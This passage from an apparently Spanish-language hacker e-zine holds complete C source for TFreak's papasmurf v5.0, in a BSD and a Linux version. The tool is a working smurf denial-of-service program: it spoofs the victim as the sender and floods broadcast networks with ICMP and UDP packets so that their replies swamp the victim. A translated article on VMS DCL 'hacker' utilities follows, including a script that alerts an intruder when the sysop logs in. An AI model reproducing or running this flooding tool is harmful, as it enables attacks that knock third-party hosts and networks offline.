- bcast[num] = inet_addr(buf);
- num++;
- if (num == 1024)
- break;
- }
- } /* end bcast while loop */
-
- /* seed our random function */
- srand(time(NULL) * getpid());
-
- /* wee.. */
- for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
- {
- if (sm.icmp)
- smurficmp(&sm, bcast[cycle]);
-
- if (sm.udp)
- {
- int x;
- for (x = 0; sm.dstport[x] != 0; x++)
- smurfudp(&sm, bcast[cycle], x);
- }
-
- /* quick nap */
- usleep(sm.delay);
-
- /* cosmetic psychadelic dots */
- if (n % 50 == 0)
- {
- printf(".");
- fflush(stdout);
- }
-
- cycle = (cycle + 1) % num;
- }
-
- exit(0);
- }
-
- void
- usage (char *s)
- {
- fprintf(stderr,
- "usage: %s <source host> <broadcast file> [options]\n"
- "\n"
- "Options\n"
- "-p: Comma separated list of dest ports (default 7)\n"
- "-r: Use random dest ports\n"
- "-R: Use random src/dest ports\n"
- "-s: Source port (0 for random (default))\n"
- "-P: Protocols to use. Either icmp, udp or both\n"
- "-S: Packet size in bytes (default 64)\n"
- "-f: Filename containg packet data (not needed)\n"
- "-n: Num of packets to send (0 is continuous (default))\n"
- "-d: Delay inbetween packets (in ms) (default 10000)\n"
- "\n", s);
- exit(-1);
- }
-
- u_long
- resolve (char *host)
- {
- struct in_addr in;
- struct hostent *he;
-
- /* try ip first */
- if ((in.s_addr = inet_addr(host)) == -1)
- {
- /* nope, try it as a fqdn */
- if ((he = gethostbyname(host)) == NULL)
- {
- /* can't resolve, bye. */
- herror("Resolving victim host");
- exit(-1);
- }
-
- memcpy( (caddr_t) &in, he->h_addr, he->h_length);
- }
-
- return(in.s_addr);
- }
-
- void
- getports (struct smurf_t *sm, char *p)
- {
- char tmpbuf[16];
- int n, i;
-
- for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
- {
- if (*p == ',')
- {
- tmpbuf[i] = '\0';
- sm->dstport[n] = (u_short) atoi(tmpbuf);
- n++; i = -1;
- continue;
- }
-
- tmpbuf[i] = *p;
- }
- tmpbuf[i] = '\0';
- sm->dstport[n] = (u_short) atoi(tmpbuf);
- sm->dstport[n + 1] = 0;
- }
-
- void
- smurficmp (struct smurf_t *sm, u_long dst)
- {
- struct ip *ip;
- struct icmp *icmp;
- char *packet;
-
- int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;
-
- packet = malloc(pktsize);
- ip = (struct ip *) packet;
- icmp = (struct icmp *) (packet + sizeof(struct ip));
-
- memset(packet, 0, pktsize);
-
- /* fill in IP header */
- ip->ip_v = 4;
- ip->ip_hl = 5;
- ip->ip_tos = 0;
- ip->ip_len = FIX(pktsize);
- ip->ip_ttl = 255;
- ip->ip_off = 0;
- ip->ip_id = FIX( getpid() );
- ip->ip_p = IPPROTO_ICMP;
- ip->ip_sum = 0;
- ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
- ip->ip_dst.s_addr = dst;
-
- /* fill in ICMP header */
- icmp->icmp_type = ICMP_ECHO;
- icmp->icmp_code = 0;
- icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); /* thx griffin */
-
- /* send it on its way */
- if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
- sizeof(struct sockaddr)) == -1)
- {
- perror("sendto()");
- exit(-1);
- }
-
- free(packet); /* free willy! */
- }
-
- void
- smurfudp (struct smurf_t *sm, u_long dst, int n)
- {
- struct ip *ip;
- struct udphdr *udp;
- char *packet, *data;
-
- int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;
-
- packet = (char *) malloc(pktsize);
- ip = (struct ip *) packet;
- udp = (struct udphdr *) (packet + sizeof(struct ip));
- data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));
-
- memset(packet, 0, pktsize);
- if (*sm->padding)
- memcpy((char *)data, sm->padding, sm->psize);
-
- /* fill in IP header */
- ip->ip_v = 4;
- ip->ip_hl = 5;
- ip->ip_tos = 0;
- ip->ip_len = FIX(pktsize);
- ip->ip_ttl = 255;
- ip->ip_off = 0;
- ip->ip_id = FIX( getpid() );
- ip->ip_p = IPPROTO_UDP;
- ip->ip_sum = 0;
- ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
- ip->ip_dst.s_addr = dst;
-
- /* fill in UDP header */
- if (sm->srcport) udp->uh_sport = htons(sm->srcport);
- else udp->uh_sport = htons(rand());
- if (sm->rnd) udp->uh_dport = htons(rand());
- else udp->uh_dport = htons(sm->dstport[n]);
- udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
- // udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));
-
- /* send it on its way */
- if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
- sizeof(struct sockaddr)) == -1)
- {
- perror("sendto()");
- exit(-1);
- }
-
- free(packet); /* free willy! */
- }
-
- u_short
- in_chksum (u_short *addr, int len)
- {
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1)
- {
- sum += *w++;
- nleft -= 2;
- }
-
- if (nleft == 1)
- {
- *(u_char *)(&answer) = *(u_char *)w;
- sum += answer;
- }
-
- sum = (sum >> 16) + (sum + 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- --- papasmurf-linux.c v5.0 ---
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- * (papa)smurf.c v5.0 by TFreak (Linux header version)
- *
- * To compile: "gcc -o smurf5 papasmurf-linux.c"
- *
- * NOTE: This version is Linux specific.
- *
- */
-
- #include <stdio.h>
- #include <netdb.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netinet/in_systm.h>
- #include <arpa/inet.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <string.h>
- #include <ctype.h>
- #include <time.h>
- #ifdef __USE_BSD
- #undef __USE_BSD
- #endif
- #include <netinet/ip.h>
- #include <netinet/ip_icmp.h>
- #include <netinet/udp.h>
-
- struct smurf_t
- {
- struct sockaddr_in sin; /* socket prot structure */
- int s; /* socket */
- int udp, icmp; /* icmp, udp booleans */
- int rnd; /* Random dst port boolean */
- int psize; /* packet size */
- int num; /* number of packets to send */
- int delay; /* delay between (in ms) */
- u_short dstport[25+1]; /* dest port array (udp) */
- u_short srcport; /* source port (udp) */
- char *padding; /* junk data */
- };
-
- /* function prototypes */
- void usage (char *);
- u_long resolve (char *);
- void getports (struct smurf_t *, char *);
- void smurficmp (struct smurf_t *, u_long);
- void smurfudp (struct smurf_t *, u_long, int);
- u_short in_chksum (u_short *, int);
-
- int
- main (int argc, char *argv[])
- {
- struct smurf_t sm;
- struct stat st;
- u_long bcast[1024];
- char buf[32];
- int c, fd, n, cycle, num = 0, on = 1;
- FILE *bcastfile;
-
- /* shameless self promotion banner */
- fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");
-
- if (argc < 3)
- usage(argv[0]);
-
- /* set defaults */
- memset((struct smurf_t *) &sm, 0, sizeof(sm));
- sm.icmp = 1;
- sm.psize = 64;
- sm.num = 0;
- sm.delay = 10000;
- sm.sin.sin_port = htons(0);
- sm.sin.sin_family = AF_INET;
- sm.srcport = 0;
- sm.dstport[0] = 7;
-
- /* resolve 'source' host, quit on error */
- sm.sin.sin_addr.s_addr = resolve(argv[1]);
-
- /* open the broadcast file */
- if ((bcastfile = fopen(argv[2], "r")) == NULL)
- {
- perror("Opening broadcast file");
- exit(-1);
- }
-
- /* parse out options */
- optind = 3;
- while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
- {
- switch (c)
- {
- /* random dest ports */
- case 'r':
- sm.rnd = 1;
- break;
-
- /* random src/dest ports */
- case 'R':
- sm.rnd = 1;
- sm.srcport = 0;
- break;
-
- /* number of packets to send */
- case 'n':
- sm.num = atoi(optarg);
- break;
-
- /* usleep between packets (in ms) */
- case 'd':
- sm.delay = atoi(optarg);
- break;
-
- /* multiple ports */
- case 'p':
- if (strchr(optarg, ','))
- getports(&sm, optarg);
- else
- sm.dstport[0] = (u_short) atoi(optarg);
- break;
-
- /* specify protocol */
- case 'P':
- if (strcmp(optarg, "icmp") == 0)
- {
- /* this is redundant */
- sm.icmp = 1;
- break;
- }
- if (strcmp(optarg, "udp") == 0)
- {
- sm.icmp = 0;
- sm.udp = 1;
- break;
- }
- if (strcmp(optarg, "both") == 0)
- {
- sm.icmp = 1;
- sm.udp = 1;
- break;
- }
-
- puts("Error: Protocol must be icmp, udp or both");
- exit(-1);
-
- /* source port */
- case 's':
- sm.srcport = (u_short) atoi(optarg);
- break;
-
- /* specify packet size */
- case 'S':
- sm.psize = atoi(optarg);
- break;
-
- /* filename to read padding in from */
- case 'f':
- /* open and stat */
- if ((fd = open(optarg, O_RDONLY)) == -1)
- {
- perror("Opening packet data file");
- exit(-1);
- }
- if (fstat(fd, &st) == -1)
- {
- perror("fstat()");
- exit(-1);
- }
-
- /* malloc and read */
- sm.padding = (char *) malloc(st.st_size);
- if (read(fd, sm.padding, st.st_size) < st.st_size)
- {
- perror("read()");
- exit(-1);
- }
-
- sm.psize = st.st_size;
- close(fd);
- break;
-
- default:
- usage(argv[0]);
- }
- } /* end getopt() loop */
-
- /* create packet padding if neccessary */
- if (!sm.padding)
- {
- sm.padding = (char *) malloc(sm.psize);
- memset(sm.padding, 0, sm.psize);
- }
-
- /* create the raw socket */
- if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
- {
- perror("Creating raw socket (are you root?)");
- exit(-1);
- }
-
- /* Include IP headers ourself (thanks anyway though) */
- if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
- {
- perror("setsockopt()");
- exit(-1);
- }
-
- /* read in our broadcasts and store them in our array */
- while (fgets(buf, sizeof buf, bcastfile) != NULL)
- {
- char *p;
- int valid;
-
- /* skip over comments/blank lines */
- if (buf[0] == '#' || buf[0] == '\n') continue;
-
- /* get rid of newline */
- buf[strlen(buf) - 1] = '\0';
-
- /* check for valid address */
- for (p = buf, valid = 1; *p != '\0'; p++)
- {
- if ( ! isdigit(*p) && *p != '.' )
- {
- fprintf(stderr, "Skipping invalid ip %s\n", buf);
- valid = 0;
- break;
- }
- }
-
- /* if valid address, copy to our array */
- if (valid)
- {
- bcast[num] = inet_addr(buf);
- num++;
- if (num == 1024)
- break;
- }
- } /* end bcast while loop */
-
- /* seed our random function */
- srand(time(NULL) * getpid());
-
- /* wee.. */
- for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
- {
- if (sm.icmp)
- smurficmp(&sm, bcast[cycle]);
-
- if (sm.udp)
- {
- int x;
- for (x = 0; sm.dstport[x] != 0; x++)
- smurfudp(&sm, bcast[cycle], x);
- }
-
- /* quick nap */
- usleep(sm.delay);
-
- /* cosmetic psychadelic dots */
- if (n % 50 == 0)
- {
- printf(".");
- fflush(stdout);
- }
-
- cycle = (cycle + 1) % num;
- }
-
- exit(0);
- }
-
- void
- usage (char *s)
- {
- fprintf(stderr,
- "usage: %s <source host> <broadcast file> [options]\n"
- "\n"
- "Options\n"
- "-p: Comma separated list of dest ports (default 7)\n"
- "-r: Use random dest ports\n"
- "-R: Use random src/dest ports\n"
- "-s: Source port (0 for random (default))\n"
- "-P: Protocols to use. Either icmp, udp or both\n"
- "-S: Packet size in bytes (default 64)\n"
- "-f: Filename containg packet data (not needed)\n"
- "-n: Num of packets to send (0 is continuous (default))\n"
- "-d: Delay inbetween packets (in ms) (default 10000)\n"
- "\n", s);
- exit(-1);
- }
-
- u_long
- resolve (char *host)
- {
- struct in_addr in;
- struct hostent *he;
-
- /* try ip first */
- if ((in.s_addr = inet_addr(host)) == -1)
- {
- /* nope, try it as a fqdn */
- if ((he = gethostbyname(host)) == NULL)
- {
- /* can't resolve, bye. */
- herror("Resolving victim host");
- exit(-1);
- }
-
- memcpy( (caddr_t) &in, he->h_addr, he->h_length);
- }
-
- return(in.s_addr);
- }
-
- void
- getports (struct smurf_t *sm, char *p)
- {
- char tmpbuf[16];
- int n, i;
-
- for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
- {
- if (*p == ',')
- {
- tmpbuf[i] = '\0';
- sm->dstport[n] = (u_short) atoi(tmpbuf);
- n++; i = -1;
- continue;
- }
-
- tmpbuf[i] = *p;
- }
- tmpbuf[i] = '\0';
- sm->dstport[n] = (u_short) atoi(tmpbuf);
- sm->dstport[n + 1] = 0;
- }
-
- void
- smurficmp (struct smurf_t *sm, u_long dst)
- {
- struct iphdr *ip;
- struct icmphdr *icmp;
- char *packet;
-
- int pktsize = sizeof(struct iphdr) + sizeof(struct icmphdr) + sm->psize;
-
- packet = malloc(pktsize);
- ip = (struct iphdr *) packet;
- icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
-
- memset(packet, 0, pktsize);
-
- /* fill in IP header */
- ip->version = 4;
- ip->ihl = 5;
- ip->tos = 0;
- ip->tot_len = htons(pktsize);
- ip->id = htons(getpid());
- ip->frag_off = 0;
- ip->ttl = 255;
- ip->protocol = IPPROTO_ICMP;
- ip->check = 0;
- ip->saddr = sm->sin.sin_addr.s_addr;
- ip->daddr = dst;
-
- /* fill in ICMP header */
- icmp->type = ICMP_ECHO;
- icmp->code = 0;
- icmp->checksum = htons(~(ICMP_ECHO << 8)); /* thx griffin */
-
- /* send it on its way */
- if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
- sizeof(struct sockaddr)) == -1)
- {
- perror("sendto()");
- exit(-1);
- }
-
- free(packet); /* free willy! */
- }
-
- void
- smurfudp (struct smurf_t *sm, u_long dst, int n)
- {
- struct iphdr *ip;
- struct udphdr *udp;
- char *packet, *data;
-
- int pktsize = sizeof(struct iphdr) + sizeof(struct udphdr) + sm->psize;
-
- packet = (char *) malloc(pktsize);
- ip = (struct iphdr *) packet;
- udp = (struct udphdr *) (packet + sizeof(struct iphdr));
- data = (char *) (packet + sizeof(struct iphdr) + sizeof(struct udphdr));
-
- memset(packet, 0, pktsize);
- if (*sm->padding)
- memcpy((char *)data, sm->padding, sm->psize);
-
- /* fill in IP header */
- ip->version = 4;
- ip->ihl = 5;
- ip->tos = 0;
- ip->tot_len = htons(pktsize);
- ip->id = htons(getpid());
- ip->frag_off = 0;
- ip->ttl = 255;
- ip->protocol = IPPROTO_UDP;
- ip->check = 0;
- ip->saddr = sm->sin.sin_addr.s_addr;
- ip->daddr = dst;
-
- /* fill in UDP header */
- if (sm->srcport) udp->source = htons(sm->srcport);
- else udp->source = htons(rand());
- if (sm->rnd) udp->dest = htons(rand());
- else udp->dest = htons(sm->dstport[n]);
- udp->len = htons(sizeof(struct udphdr) + sm->psize);
- // udp->check = in_chksum((u_short *)udp, sizeof(udp));
-
- /* send it on its way */
- if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
- sizeof(struct sockaddr)) == -1)
- {
- perror("sendto()");
- exit(-1);
- }
-
- free(packet); /* free willy! */
- }
-
- u_short
- in_chksum (u_short *addr, int len)
- {
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1)
- {
- sum += *w++;
- nleft -= 2;
- }
-
- if (nleft == 1)
- {
- *(u_char *)(&answer) = *(u_char *)w;
- sum += answer;
- }
-
- sum = (sum >> 16) + (sum + 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- 5.- Creditos
- ------------
-
- Bueno, pues por ahora se acabo lo que se daba, espero que os haya sido
- util, nada mas. Saludos a TFreak por el codigo fuente, al grupo y a todos
- los que me han ayudado a hacer este articulo y buscar informacion sobre el,
- a todos, gracias.
-
- para mas informacion, criticas, lo que sea: mac@jjf.org
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- Utilidades DCL para el hacker de VMS
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- por
- The Mentor
- (Traducido y modificado por EiVoL)
-
- Trucos especiales por Spy Silver
-
- Los comandos DCL son un lenguaje extremadamente poderoso, aqui tengo
- una seleccion de las utilidades que no solo pueden ayudar a los hackers,
- tambien son un buen ejemplo de programacion en DCL.
-
- Vistazo preliminar de DCL
-
- Hay muchos documentos de DCL (Los Documentos de ayuda de VMS estan en
- los mejores sitios para encontrar informacion) para poder usar este codigo
- fuente en un VMS copia la secion de texto en tu editor de texto favorito
- baja la fila al Vax y renombra la fila como .com, haora es una fila DCL las
- filas DCL se ejecutan con la @ ($@FILA) tambien puedes correrlo en un
- proceso separado (algo asi como el & en linux) la sintaxis es $SPAWN/NOWAIT
- @FILA, Nota del traductor: SPAWN es un comando que permite crear un
- Subproceso para ejecutar un comando de VMS, si ponemos la opcion /NOWAIT el
- proceso correra en paralelo con el creador,pero si muere el proceso padre,
- el proceso acabara su ejecucion, para interrumpir cualquier comando en un
- VMS se usa CTRL + Y.
-
- Tabla de contenidos
- <<<<<<<<<<<<<<<<<<<
-
- 1 CD.DOC Esta es la documentacion del CD.COM.
- 2 CD.COM utilidad para cambiar de directorio como el CD de PC.
- 3 HUNT.COM Busca un nodo especifico de un usuario, se usa para alertarte de
- la presencia del Sysop.
- 4 ALARM.COM es una alarma de reloj muy util.
- 5 CGO.COM Esto te avisa si alguien compila y corre un programa en c.
-
- CD.COM Version 5.0 VMS Comando de cambio de directorio
- <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
-
- Esto es muy parecido al comando CD de MS-DOS:
-
- CD - Esto muestra tu directorio home los demas directorios y en nombre del
- nodo, es similar al comando SHOW de VMS.
-
- CD DIRECTORIO - Esto te mueve al directorio elegido.
-
- CD SUBDIRECTORIO - Esto te pone en el subdirectorio egejido.
-
- CD \ - Este t pondra en tu directorio principal (home).
-
- CD HOME - Me mueve al directorio donde tengas tu login.
-
- CD SYS$LOGIN - Es como el comando SET DEFAULT SYS$LOGIN en VMS.
-
- CD .. - Creo que este ya te lo puedes imaginar.
-
- CD . - Resetea al directorio anterior.
-
- CD * - Selecciona el subdirectorio a mover de la lista de subdirectorios.
-
- CD ? - Te muestra la ayuda del CD-COM.
-
- Para navegar por los directorios de un VMS se usa le comando SET
- DEFAULT. Esto es mas elegante, tu no puedes cambiar a directorios que no
- existen. Si al pasar a un directorio sale [DIRECTORIO] Directory does not
- exist! ya te puedes imaginar lo que pasa. y ahora el codigo :)
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- $! CD.COM v6.09
- $! The Ultimate Change Directory Command.
- $!
- $ hdir = f$trnlnm("SYS$LOGIN") ! Home Directory
- $ ndir = f$edit(p1,"UPCASE") ! New Directory
- $ odir = f$environment("DEFAULT") ! Old Directory
- $ prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
- $!
- $ if (ndir .eqs. "") then goto DISPLAY ! No Dir
- $ if (ndir .eqs. "*") then goto DIRSEARCH ! Search for Dirs
- $ if (ndir .eqs. "?") then goto HELP ! Instructions
- $!
- $ PARSE:
- $ length = f$length(ndir) ! Fix up ndir
- $ if (f$location("@",ndir) .eq. 0) .or. -
- (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
- $ right = f$location("]",ndir) + 1
- $ if (right .gt. length) then right = f$location(">", ndir)
- $ if (right .le. length) then ndir = f$extract(0, right, ndir)
- $!
- $ if (f$trnlnm(ndir) .eqs. "") then goto CASESYM ! Not Logical Name
- $ ndir = f$trnlnm(ndir) ! Logical Name
- $ goto PARSE
- $!
- $ CASESYM:
- $ if ("''&ndir'" .eqs. "") then goto CASE0 ! Not Symbol
- $ ndir = 'ndir' ! Symbol
- $ goto PARSE
- $!
- $ CASE0:
- $ len_ndir = f$length(ndir) ! Regular Dir
- $ if (f$location("[", ndir) .lt. len_ndir) .or. -
- (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
- $!
- $ CASE1: ! Home Dir
- $ if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
- $ ndir = hdir
- $ goto SETDIR
- $!
- $ CASE2: ! . .. .dir
- $ if (f$location(".", ndir) .nes. 0) then goto CASE3
- $ if (ndir .eqs. "..") then ndir = "-"
- $ if (f$extract(0, 2, ndir) .eqs. "..") -
- then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
- $ ndir = "[" + ndir + "]"
- $ if (ndir .eqs. "[.]") then ndir = odir
- $ goto SETDIR
- $!
- $ CASE3: ! :
- $ if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
- $ left = f$location(":", ndir) + 1
- $ symbol = f$extract(left, 1, ndir)
- $ if (symbol .eqs. ":") then goto CASE3B ! :: Node
- $ if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
- $ ndir = f$extract(0, left, ndir) + "[" -
- + f$extract(left, len_ndir - left+1, ndir) + "]"
- $ goto SETDIR
- $!
- $ CASE3B: ! NODE::nothing
- $ if (f$length(ndir)-1 .gt. left) then goto CASE3C
- $ ndir = ndir + "[000000]"
- $ goto SETDIR
- $!
- $ CASE3C: ! NODE::directory
- $ if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
- then goto SETDIR
- $
- $ ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
- $ goto SETDIR
- $!
- $ CASE4: ! dir
- $ ndir = "[" + ndir + "]"
- $!
- $ SETDIR:
- $ set default 'ndir'
- $ if (f$parse("") .eqs. "") then goto DIRERROR
- $!
- $ DISPLAY:
- $ if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
- $ hnode = f$getsyi("NODENAME")
- $ cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
- $ if (cnode .eqs. "") then cnode = hnode
- $ cdir = f$environment("DEFAULT")
- $ write sys$output " "
- $ write sys$output " Home Node: ", hnode
- $ write sys$output " Home Directory: ", hdir
- $ if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
- $ write sys$output " Current Node: ", cnode
- $ write sys$output " Current Directory: ", cdir
- $ DISPSKIP:
- $ write sys$output " "
- $!
- $ NODISPLAY:
- $ ndir = f$environment("DEFAULT")
- $ if .not. prompton then goto END
- $!
- $ if (f$length(ndir) .ge. 32) then goto TOOLONG
- $!
- $ SETPROMPT:
- $ set prompt = 'ndir'" "
- $!
- $ END:
- $ exit
- $!
- $ DIRERROR:
- $ write sys$output " "
- $ write sys$output " ", ndir, " Directory does not exist!"
- $ write sys$output " "
- $ set default 'odir'
- $ ndir = odir
- $ goto NODISPLAY
- $!
- $! Prompt Problems------------------------------------------------------------
- $!
- $ TOOLONG:
- $! Prompt is too long. Get rid of everything to the left of [ or <. If that
- $! doesn't work, get rid of a subdirectory at a time. As a last resort,
- $! set the prompt back to $.
- $!
- $ left = f$location("[", ndir)
- $ len_ndir = f$length(ndir)
- $ if (left .ge. len_ndir) then left = f$location("<",ndir)
- $ if (left .gt. 0) .and. (left .lt. len_ndir) -
- then ndir = f$extract(left, len_ndir - left, ndir)
- $!
- $ STILLTOOLONG:
- $ if (f$length(ndir) .lt. 32) then goto SETPROMPT
- $ left = f$location(".", ndir) + 1
- $ len_ndir = f$length(ndir)
- $ if left .ge. len_ndir then ndir = "$ "
- $ if left .ne. len_ndir -
- then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
- $ goto STILLTOOLONG
- $!
- $! Wildcard Directory---------------------------------------------------------
- $!
- $ DIRSEARCH:
- $ error_message = f$environment("MESSAGE")
- $ on control_y then goto DIREND
- $ on control_c then goto DIREND
- $ set message/nosev/nofac/noid/notext
- $ write sys$output " "
- $ dispct = 1
- $ dirct = 0
- $ pauseflag = 1
- $!
- $ DIRLOOP:
- $ userfile = f$search("*.dir")
- $ if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
- $ if (userfile .eqs. "") then goto DIRNONE
- $ dispct = dispct + 1
- $ dirct = dirct + 1
- $ on severe then $ userprot = "No Priv"
- $ userprot = f$file_attributes(userfile,"PRO")
- $ if userprot .nes. "No Priv" then userprot = " "
- $ userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
- $ userprot'dirct' = userprot
- $ lengthflag = (f$length(userfile'dirct') .gt. 18)
- $ if lengthflag then write sys$output -
- f$fao(" !3SL !34AS ", dirct, userfile'dirct'), userprot'dirct'
- $ if (.not. lengthflag) then write sys$output -
- f$fao(" !3SL !20AS ", dirct, userfile'dirct'), userprot'dirct'
- $ if (dispct .lt. 8) then goto DIRLOOP
- $ dirct = dirct + 1
- $ userfile'dirct' = ""
- $ dirct = dirct + 1
- $ userfile'dirct' = ""
- $ if pauseflag then goto DIRMENU
- $ dispct = 0
- $ goto DIRLOOP
- $!
- $ DIRMENU:
- $ write sys$output " "
- $ if (userfile .eqs. "") then goto DIRMENU2
- $ write sys$output " M More subdirectories"
- $ if pauseflag then -
- $ write sys$output " N More subdirectories/No pause"
- $!
- $ DIRMENU2:
- $ write sys$output " R Re-Display subdirectories"
- $ write sys$output " Q Quit (default)"
- $
- $ DIRINQUIRE:
- $ write sys$output " "
- $ inquire dirchoice " Select One"
- $ write sys$output " "
- $!
- $ if (dirchoice .gt. 0) .and. -
- (dirchoice .le. dirct) then goto DIRCASEDIGIT
- $ dirchoice = f$edit(dirchoice,"UPCASE")
- $ if (dirchoice .eqs. "") .or. -
- (dirchoice .eqs. "Q") then goto DIRCASEBLANK
- $ if (dirchoice .eqs. "M") .or. -
- (dirchoice .eqs. "N") then goto DIRCASEMORE
- $ if (dirchoice .eqs. "R") then goto DIRCASERED
- $!
- $ DIRCASERROR:
- $ if (dirct .eq. 1) then write sys$output -
- " Select 1 to change to the ", userfile1, " subdirectory. "
- $ revdirct = dirct
- $ if (dispct .eq. 8) then revdirct = revdirct - 2
- $ if (dirct .gt. 1) then write sys$output -
- " Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
- $ goto DIRINQUIRE
- $!
- $ DIRCASEDIGIT:
- $ if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
- $ ndir = userfile'dirchoice'
- $ goto DIREND
- $!
- $ DIRCASEBLANK:
- $ write sys$output " Subdirectory not changed."
- $ write sys$output " "
- $ goto DIREND
- $!
- $ DIRCASEMORE:
- $ dispct = 0
- $ if (dirchoice .eqs. "N") then pauseflag = 0
- $ if (userfile .nes. "") then goto DIRLOOP
- $ write sys$output " No more subdirectories to display."
- $ goto DIRINQUIRE
- $!
- $ DIRCASERED:
- $ dispct = 1
- $ DISPLOOP:
- $ if (userfile'dispct' .eqs "") then goto DISPDONT
- $ lengthflag = (f$length(userfile'dispct') .gt. 18)
- $ if lengthflag then write sys$output -
- f$fao(" !3SL !34AS ", dispct, userfile'dispct'), userprot'dispct'
- $ if (.not. lengthflag) then write sys$output -
- f$fao(" !3SL !20AS ", dispct, userfile'dispct'), userprot'dispct'
- $ DISPDONT:
- $ dispct = dispct + 1
- $ if (dispct .le. dirct) then goto DISPLOOP
- $ goto DIRMENU
- $!
- $ DIRNONE:
- $ write sys$output "No subdirectories to choose, or no directory privileges."
- $ write sys$output " "
- $ goto DIREND
- $!
- $ DIREND:
- $ set message 'error_message'
- $ on control_y then exit
- $ on control_c then exit
- $ if (ndir .eqs. "*") then goto DISPLAY
- $ goto PARSE
- $!
- $!-Help-----------------------------------------------------------------------
- $!
- $ HELP:
- $ type sys$input
-
- CD.COM Version 6 VMS Change Directory Command
-
- Usage: CD command/directory
-
- CD Display home directory, CD .. Change directory to the
- current directory, node. CD [-] dir above current dir.
-
- CD \ Change directory to your CD ..sub Change directory to a
- CD HOME SYS$LOGIN directory. CD [-.sub] "sideways" subdirectory.
-
- CD dir Change directory to the CD * Display/select the
- CD [dir] [dir] directory. available subdirectories.
-
- CD .sub Change directory to the CD . Reset current directory.
- CD [.sub] [.sub] subdirectory. CD ? Display CD instructions.
-
- CD :== @SYS$LOGIN:CD.COM DEFINE SYS$PROMPT "ON"
- To make CD available from To have the VMS $ prompt
- any directory you change to. display the current directory.
-
- By The Mentor
- $ goto END
-
- ------------ FIN -------------------------------------------------------------
-
- CODIGO DEL HUNT.COM
- <<<<<<<<<<<<<<<<<<<
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- $ ! HUNT.COM
- $ ! By The Mentor
- $ ! Updated by: The Mad Mexican
- $ ! Usage: SPAWN/NOWAIT @HUNT
- $ !
- $ !Searches SHOW USER output for a specified user, strobes at given
- $ !intervals considering the severity of the hunt at which time output
- $ !is generated and process terminates. If user loggs in then output
- $ !is generated and process terminates. May check both nodes if a set
- $ !host is called. Also supports a file with the names to be hunted for.
- $ !
- $ ! *** NOTE *** This is set up for a two-node system with NYSSA
- $ ! being the default node and TEGAN being the alternate
- $ ! node (Circuit Breaker and some others will recognize
- $ ! the nodes as my 'home' ones.) You will need to
- $ ! slightly modify the code to reflect the nodename(s)
- $ ! of whatever system you are using...
- $ !
- $ !
- $ !
- $ say="write sys$output"
- $ on control then goto door
- $ monitored_node = "''NODE'"
- $ say "Monitoring node ''monitored_node'. "
- $ severity_of_hunt:
- $ inquire selection "Severity of HUNT, 1 being the most urgent: 1-2-3"
- $ if selection.ge.2 then goto selection_2
- $ delay="wait 00:00:20"
- $ loop_count=40
- $ goto begin_process
- $ selection_2:
- $ if selection.eq.3 then goto selection_3
- $ delay="wait 00:01:00"
- $ loop_count=8
- $ goto begin_process
- $ if selection.gt.3 then goto severity_of_hunt
- $ delay="wait 00:02:30"
- $ loop_count=20
- $ begin_process:
